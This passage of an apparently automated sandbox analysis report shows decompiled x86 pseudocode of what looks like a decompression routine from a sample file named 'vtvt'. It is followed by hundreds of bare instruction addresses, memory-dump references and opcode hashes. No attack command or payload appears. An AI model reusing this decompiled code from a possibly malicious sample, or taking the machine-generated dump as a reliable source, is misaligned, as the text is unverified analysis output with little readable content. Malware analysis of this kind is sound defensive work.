                                                                                    									} else {
                                                                                    										 *(__ebp - 0x10) = __edx;
                                                                                    										0x800 = 0x800 - __ecx;
                                                                                    										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                    										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                    										 *__esi = __dx;
                                                                                    									}
                                                                                    									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                    									if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                    										L111:
                                                                                    										_t368 = __ebp - 0x48;
                                                                                    										 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                    										__eflags =  *_t368;
                                                                                    										goto L112;
                                                                                    									} else {
                                                                                    										goto L109;
                                                                                    									}
                                                                                    								}
                                                                                    								__ecx =  *(__ebp - 0xc);
                                                                                    								__ebx = __ebx + __ebx;
                                                                                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                    								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                    								 *(__ebp - 0x44) = __ebx;
                                                                                    								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                    									__ecx =  *(__ebp - 0x10);
                                                                                    									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                    									__ebx = __ebx | 0x00000001;
                                                                                    									__eflags = __ebx;
                                                                                    									 *(__ebp - 0x44) = __ebx;
                                                                                    								}
                                                                                    								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                    								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                    									L101:
                                                                                    									_t338 = __ebp - 0x48;
                                                                                    									 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                    									__eflags =  *_t338;
                                                                                    									goto L102;
                                                                                    								} else {
                                                                                    									goto L99;
                                                                                    								}
                                                                                    							}
                                                                                    							__edx =  *(__ebp - 4);
                                                                                    							__eax = __eax - __ebx;
                                                                                    							 *(__ebp - 0x40) = __ecx;
                                                                                    							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                    							goto L108;
                                                                                    						case 0x1a:
                                                                                    							L56:
                                                                                    							__eflags =  *(__ebp - 0x64);
                                                                                    							if( *(__ebp - 0x64) == 0) {
                                                                                    								 *(__ebp - 0x88) = 0x1a;
                                                                                    								goto L170;
                                                                                    							}
                                                                                    							__ecx =  *(__ebp - 0x68);
                                                                                    							__al =  *(__ebp - 0x5c);
                                                                                    							__edx =  *(__ebp - 8);
                                                                                    							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                    							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                    							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                    							 *( *(__ebp - 0x68)) = __al;
                                                                                    							__ecx =  *(__ebp - 0x14);
                                                                                    							 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                    							__eax = __ecx + 1;
                                                                                    							__edx = 0;
                                                                                    							_t192 = __eax %  *(__ebp - 0x74);
                                                                                    							__eax = __eax /  *(__ebp - 0x74);
                                                                                    							__edx = _t192;
                                                                                    							goto L79;
                                                                                    						case 0x1b:
                                                                                    							goto L75;
                                                                                    						case 0x1c:
                                                                                    							while(1) {
                                                                                    								L123:
                                                                                    								__eflags =  *(__ebp - 0x64);
                                                                                    								if( *(__ebp - 0x64) == 0) {
                                                                                    									break;
                                                                                    								}
                                                                                    								__eax =  *(__ebp - 0x14);
                                                                                    								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                    								__eflags = __eax -  *(__ebp - 0x74);
                                                                                    								if(__eax >=  *(__ebp - 0x74)) {
                                                                                    									__eax = __eax +  *(__ebp - 0x74);
                                                                                    									__eflags = __eax;
                                                                                    								}
                                                                                    								__edx =  *(__ebp - 8);
                                                                                    								__cl =  *(__eax + __edx);
                                                                                    								__eax =  *(__ebp - 0x14);
                                                                                    								 *(__ebp - 0x5c) = __cl;
                                                                                    								 *(__eax + __edx) = __cl;
                                                                                    								__eax = __eax + 1;
                                                                                    								__edx = 0;
                                                                                    								_t414 = __eax %  *(__ebp - 0x74);
                                                                                    								__eax = __eax /  *(__ebp - 0x74);
                                                                                    								__edx = _t414;
                                                                                    								__eax =  *(__ebp - 0x68);
                                                                                    								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                    								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                    								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                    								__eflags =  *(__ebp - 0x30);
                                                                                    								 *( *(__ebp - 0x68)) = __cl;
                                                                                    								 *(__ebp - 0x14) = _t414;
                                                                                    								if( *(__ebp - 0x30) > 0) {
                                                                                    									continue;
                                                                                    								} else {
                                                                                    									goto L80;
                                                                                    								}
                                                                                    							}
                                                                                    							 *(__ebp - 0x88) = 0x1c;
                                                                                    							goto L170;
                                                                                    					}
                                                                                    				}
                                                                                    			}













                                                                                    0x00000000
                                                                                    0x004070ab
                                                                                    0x004070ab
                                                                                    0x004070af
                                                                                    0x00407166
                                                                                    0x00407169
                                                                                    0x00407175
                                                                                    0x00407056
                                                                                    0x00407056
                                                                                    0x00407059
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x004073ce
                                                                                    0x004073ce
                                                                                    0x004073d4
                                                                                    0x004073da
                                                                                    0x004073e0
                                                                                    0x004073fa
                                                                                    0x004073fd
                                                                                    0x00407403
                                                                                    0x0040740e
                                                                                    0x00407410
                                                                                    0x004073e2
                                                                                    0x004073e2
                                                                                    0x004073f1
                                                                                    0x004073f5
                                                                                    0x004073f5
                                                                                    0x0040741a
                                                                                    0x00407441
                                                                                    0x00407441
                                                                                    0x00407447
                                                                                    0x00407447
                                                                                    0x00000000
                                                                                    0x0040741c
                                                                                    0x0040741c
                                                                                    0x00407420
                                                                                    0x004075cf
                                                                                    0x00000000
                                                                                    0x004075cf
                                                                                    0x0040742c
                                                                                    0x00407433
                                                                                    0x0040743b
                                                                                    0x0040743e
                                                                                    0x00000000
                                                                                    0x0040743e
                                                                                    0x004070b5
                                                                                    0x004070b9
                                                                                    0x004075fa
                                                                                    0x004075fa
                                                                                    0x004075fd
                                                                                    0x00407601
                                                                                    0x00407601
                                                                                    0x004070bf
                                                                                    0x004070c5
                                                                                    0x004070c8
                                                                                    0x004070cc
                                                                                    0x004070cf
                                                                                    0x004070d3
                                                                                    0x00407599
                                                                                    0x004075e5
                                                                                    0x004075ed
                                                                                    0x004075f4
                                                                                    0x004075f6
                                                                                    0x00000000
                                                                                    0x004075f6
                                                                                    0x004070d9
                                                                                    0x004070dc
                                                                                    0x004070e2
                                                                                    0x004070e4
                                                                                    0x004070e4
                                                                                    0x004070e7
                                                                                    0x004070ea
                                                                                    0x004070ed
                                                                                    0x004070f0
                                                                                    0x004070f3
                                                                                    0x004070f6
                                                                                    0x004070f7
                                                                                    0x004070f9
                                                                                    0x004070f9
                                                                                    0x004070f9
                                                                                    0x004070fc
                                                                                    0x004070ff
                                                                                    0x00407102
                                                                                    0x00407105
                                                                                    0x00407105
                                                                                    0x00407108
                                                                                    0x0040710a
                                                                                    0x0040710a
                                                                                    0x0040710d
                                                                                    0x0040710d
                                                                                    0x0040710d
                                                                                    0x00406be3
                                                                                    0x00406be3
                                                                                    0x00406bec
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406bf2
                                                                                    0x00000000
                                                                                    0x00406bfd
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c06
                                                                                    0x00406c09
                                                                                    0x00406c0c
                                                                                    0x00406c10
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c16
                                                                                    0x00406c19
                                                                                    0x00406c1b
                                                                                    0x00406c1c
                                                                                    0x00406c1f
                                                                                    0x00406c21
                                                                                    0x00406c22
                                                                                    0x00406c24
                                                                                    0x00406c27
                                                                                    0x00406c2c
                                                                                    0x00406c31
                                                                                    0x00406c3a
                                                                                    0x00406c4d
                                                                                    0x00406c50
                                                                                    0x00406c5c
                                                                                    0x00406c84
                                                                                    0x00406c86
                                                                                    0x00406c94
                                                                                    0x00406c94
                                                                                    0x00406c98
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c88
                                                                                    0x00406c88
                                                                                    0x00406c8b
                                                                                    0x00406c8c
                                                                                    0x00406c8c
                                                                                    0x00000000
                                                                                    0x00406c88
                                                                                    0x00406c62
                                                                                    0x00406c67
                                                                                    0x00406c67
                                                                                    0x00406c70
                                                                                    0x00406c78
                                                                                    0x00406c7b
                                                                                    0x00000000
                                                                                    0x00406c81
                                                                                    0x00406c81
                                                                                    0x00000000
                                                                                    0x00406c81
                                                                                    0x00000000
                                                                                    0x00406c9e
                                                                                    0x00406c9e
                                                                                    0x00406ca2
                                                                                    0x0040754e
                                                                                    0x00000000
                                                                                    0x0040754e
                                                                                    0x00406cab
                                                                                    0x00406cbb
                                                                                    0x00406cbe
                                                                                    0x00406cc1
                                                                                    0x00406cc1
                                                                                    0x00406cc1
                                                                                    0x00406cc4
                                                                                    0x00406cc8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406cca
                                                                                    0x00406cd0
                                                                                    0x00406cfa
                                                                                    0x00406d00
                                                                                    0x00406d07
                                                                                    0x00000000
                                                                                    0x00406d07
                                                                                    0x00406cd6
                                                                                    0x00406cd9
                                                                                    0x00406cde
                                                                                    0x00406cde
                                                                                    0x00406ce9
                                                                                    0x00406cf1
                                                                                    0x00406cf4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d39
                                                                                    0x00406d3f
                                                                                    0x00406d42
                                                                                    0x00406d4f
                                                                                    0x00406d57
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d0e
                                                                                    0x00406d0e
                                                                                    0x00406d12
                                                                                    0x0040755d
                                                                                    0x00000000
                                                                                    0x0040755d
                                                                                    0x00406d1e
                                                                                    0x00406d29
                                                                                    0x00406d29
                                                                                    0x00406d29
                                                                                    0x00406d2c
                                                                                    0x00406d2f
                                                                                    0x00406d32
                                                                                    0x00406d37
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d5f
                                                                                    0x00406d61
                                                                                    0x00406d64
                                                                                    0x00406dd5
                                                                                    0x00406dd8
                                                                                    0x00406ddb
                                                                                    0x00406de2
                                                                                    0x00406dec
                                                                                    0x00000000
                                                                                    0x00406dec
                                                                                    0x00406d66
                                                                                    0x00406d6a
                                                                                    0x00406d6d
                                                                                    0x00406d6f
                                                                                    0x00406d72
                                                                                    0x00406d75
                                                                                    0x00406d77
                                                                                    0x00406d7a
                                                                                    0x00406d7c
                                                                                    0x00406d81
                                                                                    0x00406d84
                                                                                    0x00406d87
                                                                                    0x00406d8b
                                                                                    0x00406d92
                                                                                    0x00406d95
                                                                                    0x00406d9c
                                                                                    0x00406da0
                                                                                    0x00406da8
                                                                                    0x00406da8
                                                                                    0x00406da8
                                                                                    0x00406da2
                                                                                    0x00406da2
                                                                                    0x00406da2
                                                                                    0x00406d97
                                                                                    0x00406d97
                                                                                    0x00406d97
                                                                                    0x00406dac
                                                                                    0x00406daf
                                                                                    0x00406dcd
                                                                                    0x00406dcf
                                                                                    0x00000000
                                                                                    0x00406db1
                                                                                    0x00406db1
                                                                                    0x00406db4
                                                                                    0x00406db7
                                                                                    0x00406dba
                                                                                    0x00406dbc
                                                                                    0x00406dbc
                                                                                    0x00406dbc
                                                                                    0x00406dbf
                                                                                    0x00406dc2
                                                                                    0x00406dc4
                                                                                    0x00406dc5
                                                                                    0x00406dc8
                                                                                    0x00000000
                                                                                    0x00406dc8
                                                                                    0x00000000
                                                                                    0x00406ffe
                                                                                    0x00407002
                                                                                    0x00407020
                                                                                    0x00407023
                                                                                    0x0040702a
                                                                                    0x0040702d
                                                                                    0x00407030
                                                                                    0x00407033
                                                                                    0x00407036
                                                                                    0x00407039
                                                                                    0x0040703b
                                                                                    0x00407042
                                                                                    0x00407043
                                                                                    0x00407045
                                                                                    0x00407048
                                                                                    0x0040704b
                                                                                    0x0040704e
                                                                                    0x0040704e
                                                                                    0x00407053
                                                                                    0x00000000
                                                                                    0x00407053
                                                                                    0x00407004
                                                                                    0x00407007
                                                                                    0x0040700a
                                                                                    0x00407014
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407068
                                                                                    0x0040706c
                                                                                    0x0040708f
                                                                                    0x00407092
                                                                                    0x00407095
                                                                                    0x0040709f
                                                                                    0x0040706e
                                                                                    0x0040706e
                                                                                    0x00407071
                                                                                    0x00407074
                                                                                    0x00407077
                                                                                    0x00407084
                                                                                    0x00407087
                                                                                    0x00407087
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040711c
                                                                                    0x00407120
                                                                                    0x00407127
                                                                                    0x0040712a
                                                                                    0x0040712d
                                                                                    0x00407137
                                                                                    0x00000000
                                                                                    0x00407137
                                                                                    0x00407122
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407143
                                                                                    0x00407147
                                                                                    0x0040714e
                                                                                    0x00407151
                                                                                    0x00407154
                                                                                    0x00407149
                                                                                    0x00407149
                                                                                    0x00407149
                                                                                    0x00407157
                                                                                    0x0040715a
                                                                                    0x0040715d
                                                                                    0x0040715d
                                                                                    0x00407160
                                                                                    0x00407163
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407203
                                                                                    0x00407203
                                                                                    0x00407207
                                                                                    0x004075a5
                                                                                    0x00000000
                                                                                    0x004075a5
                                                                                    0x0040720d
                                                                                    0x00407210
                                                                                    0x00407213
                                                                                    0x00407217
                                                                                    0x0040721a
                                                                                    0x00407220
                                                                                    0x00407222
                                                                                    0x00407222
                                                                                    0x00407222
                                                                                    0x00407225
                                                                                    0x00407228
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406df8
                                                                                    0x00406df8
                                                                                    0x00406dfc
                                                                                    0x00407569
                                                                                    0x00000000
                                                                                    0x00407569
                                                                                    0x00406e02
                                                                                    0x00406e05
                                                                                    0x00406e08
                                                                                    0x00406e0c
                                                                                    0x00406e0f
                                                                                    0x00406e15
                                                                                    0x00406e17
                                                                                    0x00406e17
                                                                                    0x00406e17
                                                                                    0x00406e1a
                                                                                    0x00406e1d
                                                                                    0x00406e1d
                                                                                    0x00406e20
                                                                                    0x00406e23
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406e29
                                                                                    0x00406e2f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406e35
                                                                                    0x00406e35
                                                                                    0x00406e39
                                                                                    0x00406e3c
                                                                                    0x00406e3f
                                                                                    0x00406e42
                                                                                    0x00406e45
                                                                                    0x00406e46
                                                                                    0x00406e49
                                                                                    0x00406e4b
                                                                                    0x00406e51
                                                                                    0x00406e54
                                                                                    0x00406e57
                                                                                    0x00406e5a
                                                                                    0x00406e5d
                                                                                    0x00406e60
                                                                                    0x00406e63
                                                                                    0x00406e7f
                                                                                    0x00406e82
                                                                                    0x00406e85
                                                                                    0x00406e88
                                                                                    0x00406e8f
                                                                                    0x00406e93
                                                                                    0x00406e95
                                                                                    0x00406e99
                                                                                    0x00406e65
                                                                                    0x00406e65
                                                                                    0x00406e69
                                                                                    0x00406e71
                                                                                    0x00406e76
                                                                                    0x00406e78
                                                                                    0x00406e7a
                                                                                    0x00406e7a
                                                                                    0x00406e9c
                                                                                    0x00406ea3
                                                                                    0x00406ea6
                                                                                    0x00000000
                                                                                    0x00406eac
                                                                                    0x00000000
                                                                                    0x00406eac
                                                                                    0x00000000
                                                                                    0x00406eb1
                                                                                    0x00406eb1
                                                                                    0x00406eb5
                                                                                    0x00407575
                                                                                    0x00000000
                                                                                    0x00407575
                                                                                    0x00406ebb
                                                                                    0x00406ebe
                                                                                    0x00406ec1
                                                                                    0x00406ec5
                                                                                    0x00406ec8
                                                                                    0x00406ece
                                                                                    0x00406ed0
                                                                                    0x00406ed0
                                                                                    0x00406ed0
                                                                                    0x00406ed3
                                                                                    0x00406ed6
                                                                                    0x00406ed6
                                                                                    0x00406ed6
                                                                                    0x00406edc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406ede
                                                                                    0x00406ee1
                                                                                    0x00406ee4
                                                                                    0x00406ee7
                                                                                    0x00406eea
                                                                                    0x00406eed
                                                                                    0x00406ef0
                                                                                    0x00406ef3
                                                                                    0x00406ef6
                                                                                    0x00406ef9
                                                                                    0x00406efc
                                                                                    0x00406f14
                                                                                    0x00406f17
                                                                                    0x00406f1a
                                                                                    0x00406f1d
                                                                                    0x00406f1d
                                                                                    0x00406f20
                                                                                    0x00406f24
                                                                                    0x00406f26
                                                                                    0x00406efe
                                                                                    0x00406efe
                                                                                    0x00406f06
                                                                                    0x00406f0b
                                                                                    0x00406f0d
                                                                                    0x00406f0f
                                                                                    0x00406f0f
                                                                                    0x00406f29
                                                                                    0x00406f30
                                                                                    0x00406f33
                                                                                    0x00000000
                                                                                    0x00406f35
                                                                                    0x00000000
                                                                                    0x00406f35
                                                                                    0x00406f33
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406f75
                                                                                    0x00406f75
                                                                                    0x00406f79
                                                                                    0x00407581
                                                                                    0x00000000
                                                                                    0x00407581
                                                                                    0x00406f7f
                                                                                    0x00406f82
                                                                                    0x00406f85
                                                                                    0x00406f89
                                                                                    0x00406f8c
                                                                                    0x00406f92
                                                                                    0x00406f94
                                                                                    0x00406f94
                                                                                    0x00406f94
                                                                                    0x00406f97
                                                                                    0x00406f9a
                                                                                    0x00406f9a
                                                                                    0x00406fa0
                                                                                    0x00406f3e
                                                                                    0x00406f3e
                                                                                    0x00406f41
                                                                                    0x00000000
                                                                                    0x00406f41
                                                                                    0x00406fa2
                                                                                    0x00406fa2
                                                                                    0x00406fa5
                                                                                    0x00406fa8
                                                                                    0x00406fab
                                                                                    0x00406fae
                                                                                    0x00406fb1
                                                                                    0x00406fb4
                                                                                    0x00406fb7
                                                                                    0x00406fba
                                                                                    0x00406fbd
                                                                                    0x00406fc0
                                                                                    0x00406fd8
                                                                                    0x00406fdb
                                                                                    0x00406fde
                                                                                    0x00406fe1
                                                                                    0x00406fe1
                                                                                    0x00406fe4
                                                                                    0x00406fe8
                                                                                    0x00406fea
                                                                                    0x00406fc2
                                                                                    0x00406fc2
                                                                                    0x00406fca
                                                                                    0x00406fcf
                                                                                    0x00406fd1
                                                                                    0x00406fd3
                                                                                    0x00406fd3
                                                                                    0x00406fed
                                                                                    0x00406ff4
                                                                                    0x00406ff7
                                                                                    0x00000000
                                                                                    0x00406ff9
                                                                                    0x00000000
                                                                                    0x00406ff9
                                                                                    0x00000000
                                                                                    0x00407286
                                                                                    0x00407286
                                                                                    0x0040728a
                                                                                    0x004075b1
                                                                                    0x00000000
                                                                                    0x004075b1
                                                                                    0x00407290
                                                                                    0x00407293
                                                                                    0x00407296
                                                                                    0x0040729a
                                                                                    0x0040729d
                                                                                    0x004072a3
                                                                                    0x004072a5
                                                                                    0x004072a5
                                                                                    0x004072a5
                                                                                    0x004072a8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407395
                                                                                    0x00407399
                                                                                    0x004073bb
                                                                                    0x004073be
                                                                                    0x004073c8
                                                                                    0x00000000
                                                                                    0x004073c8
                                                                                    0x0040739b
                                                                                    0x0040739e
                                                                                    0x004073a2
                                                                                    0x004073a5
                                                                                    0x004073a5
                                                                                    0x004073a8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407452
                                                                                    0x00407456
                                                                                    0x00407474
                                                                                    0x00407474
                                                                                    0x00407474
                                                                                    0x0040747b
                                                                                    0x00407482
                                                                                    0x00407489
                                                                                    0x00407489
                                                                                    0x00000000
                                                                                    0x00407489
                                                                                    0x00407458
                                                                                    0x0040745b
                                                                                    0x0040745e
                                                                                    0x00407461
                                                                                    0x00407468
                                                                                    0x004073ac
                                                                                    0x004073ac
                                                                                    0x004073af
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407543
                                                                                    0x00407546
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040717d
                                                                                    0x0040717f
                                                                                    0x00407186
                                                                                    0x00407187
                                                                                    0x00407189
                                                                                    0x0040718c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407194
                                                                                    0x00407197
                                                                                    0x0040719a
                                                                                    0x0040719c
                                                                                    0x0040719e
                                                                                    0x0040719e
                                                                                    0x0040719f
                                                                                    0x004071a2
                                                                                    0x004071a9
                                                                                    0x004071ac
                                                                                    0x004071ba
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407490
                                                                                    0x00407490
                                                                                    0x00407493
                                                                                    0x0040749a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040749f
                                                                                    0x0040749f
                                                                                    0x004074a3
                                                                                    0x004075db
                                                                                    0x00000000
                                                                                    0x004075db
                                                                                    0x004074a9
                                                                                    0x004074ac
                                                                                    0x004074af
                                                                                    0x004074b3
                                                                                    0x004074b6
                                                                                    0x004074bc
                                                                                    0x004074be
                                                                                    0x004074be
                                                                                    0x004074be
                                                                                    0x004074c1
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c7
                                                                                    0x004074c7
                                                                                    0x004074cb
                                                                                    0x0040752b
                                                                                    0x0040752e
                                                                                    0x00407533
                                                                                    0x00407534
                                                                                    0x00407536
                                                                                    0x00407538
                                                                                    0x0040753b
                                                                                    0x00000000
                                                                                    0x0040753b
                                                                                    0x004074cd
                                                                                    0x004074d3
                                                                                    0x004074d6
                                                                                    0x004074d9
                                                                                    0x004074dc
                                                                                    0x004074df
                                                                                    0x004074e2
                                                                                    0x004074e5
                                                                                    0x004074e8
                                                                                    0x004074eb
                                                                                    0x004074ee
                                                                                    0x00407507
                                                                                    0x0040750a
                                                                                    0x0040750d
                                                                                    0x00407510
                                                                                    0x00407514
                                                                                    0x00407516
                                                                                    0x00407516
                                                                                    0x00407517
                                                                                    0x0040751a
                                                                                    0x004074f0
                                                                                    0x004074f0
                                                                                    0x004074f8
                                                                                    0x004074fd
                                                                                    0x004074ff
                                                                                    0x00407502
                                                                                    0x00407502
                                                                                    0x0040751d
                                                                                    0x00407524
                                                                                    0x00000000
                                                                                    0x00407526
                                                                                    0x00000000
                                                                                    0x00407526
                                                                                    0x00000000
                                                                                    0x004071c2
                                                                                    0x004071c5
                                                                                    0x004071fb
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732e
                                                                                    0x0040732e
                                                                                    0x00407331
                                                                                    0x00407333
                                                                                    0x004075bd
                                                                                    0x00000000
                                                                                    0x004075bd
                                                                                    0x00407339
                                                                                    0x0040733c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407342
                                                                                    0x00407346
                                                                                    0x00407349
                                                                                    0x00407349
                                                                                    0x00407349
                                                                                    0x00000000
                                                                                    0x00407349
                                                                                    0x004071c7
                                                                                    0x004071c9
                                                                                    0x004071cb
                                                                                    0x004071cd
                                                                                    0x004071d0
                                                                                    0x004071d1
                                                                                    0x004071d3
                                                                                    0x004071d5
                                                                                    0x004071d8
                                                                                    0x004071db
                                                                                    0x004071f1
                                                                                    0x004071f6
                                                                                    0x0040722e
                                                                                    0x0040722e
                                                                                    0x00407232
                                                                                    0x0040725e
                                                                                    0x00407260
                                                                                    0x00407267
                                                                                    0x0040726a
                                                                                    0x0040726d
                                                                                    0x0040726d
                                                                                    0x00407272
                                                                                    0x00407272
                                                                                    0x00407274
                                                                                    0x00407277
                                                                                    0x0040727e
                                                                                    0x00407281
                                                                                    0x004072ae
                                                                                    0x004072ae
                                                                                    0x004072b1
                                                                                    0x004072b4
                                                                                    0x00407328
                                                                                    0x00407328
                                                                                    0x00407328
                                                                                    0x00000000
                                                                                    0x00407328
                                                                                    0x004072b6
                                                                                    0x004072bc
                                                                                    0x004072bf
                                                                                    0x004072c2
                                                                                    0x004072c5
                                                                                    0x004072c8
                                                                                    0x004072cb
                                                                                    0x004072ce
                                                                                    0x004072d1
                                                                                    0x004072d4
                                                                                    0x004072d7
                                                                                    0x004072f0
                                                                                    0x004072f2
                                                                                    0x004072f5
                                                                                    0x004072f6
                                                                                    0x004072f9
                                                                                    0x004072fb
                                                                                    0x004072fe
                                                                                    0x00407300
                                                                                    0x00407302
                                                                                    0x00407305
                                                                                    0x00407307
                                                                                    0x0040730a
                                                                                    0x0040730e
                                                                                    0x00407310
                                                                                    0x00407310
                                                                                    0x00407311
                                                                                    0x00407314
                                                                                    0x00407317
                                                                                    0x004072d9
                                                                                    0x004072d9
                                                                                    0x004072e1
                                                                                    0x004072e6
                                                                                    0x004072e8
                                                                                    0x004072eb
                                                                                    0x004072eb
                                                                                    0x0040731a
                                                                                    0x00407321
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x00000000
                                                                                    0x00407323
                                                                                    0x00000000
                                                                                    0x00407323
                                                                                    0x00407321
                                                                                    0x00407234
                                                                                    0x00407237
                                                                                    0x00407239
                                                                                    0x0040723c
                                                                                    0x0040723f
                                                                                    0x00407242
                                                                                    0x00407244
                                                                                    0x00407247
                                                                                    0x0040724a
                                                                                    0x0040724a
                                                                                    0x0040724d
                                                                                    0x0040724d
                                                                                    0x00407250
                                                                                    0x00407257
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x00000000
                                                                                    0x00407259
                                                                                    0x00000000
                                                                                    0x00407259
                                                                                    0x00407257
                                                                                    0x004071dd
                                                                                    0x004071e0
                                                                                    0x004071e2
                                                                                    0x004071e5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406f44
                                                                                    0x00406f44
                                                                                    0x00406f48
                                                                                    0x0040758d
                                                                                    0x00000000
                                                                                    0x0040758d
                                                                                    0x00406f4e
                                                                                    0x00406f51
                                                                                    0x00406f54
                                                                                    0x00406f57
                                                                                    0x00406f5a
                                                                                    0x00406f5d
                                                                                    0x00406f60
                                                                                    0x00406f62
                                                                                    0x00406f65
                                                                                    0x00406f68
                                                                                    0x00406f6b
                                                                                    0x00406f6d
                                                                                    0x00406f6d
                                                                                    0x00406f6d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040734c
                                                                                    0x0040734c
                                                                                    0x0040734c
                                                                                    0x00407350
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407356
                                                                                    0x00407359
                                                                                    0x0040735c
                                                                                    0x0040735f
                                                                                    0x00407361
                                                                                    0x00407361
                                                                                    0x00407361
                                                                                    0x00407364
                                                                                    0x00407367
                                                                                    0x0040736a
                                                                                    0x0040736d
                                                                                    0x00407370
                                                                                    0x00407373
                                                                                    0x00407374
                                                                                    0x00407376
                                                                                    0x00407376
                                                                                    0x00407376
                                                                                    0x00407379
                                                                                    0x0040737c
                                                                                    0x0040737f
                                                                                    0x00407382
                                                                                    0x00407385
                                                                                    0x00407389
                                                                                    0x0040738b
                                                                                    0x0040738e
                                                                                    0x00000000
                                                                                    0x00407390
                                                                                    0x00000000
                                                                                    0x00407390
                                                                                    0x0040738e
                                                                                    0x004075c3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406bf2

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                                                    • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                                                                                    • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
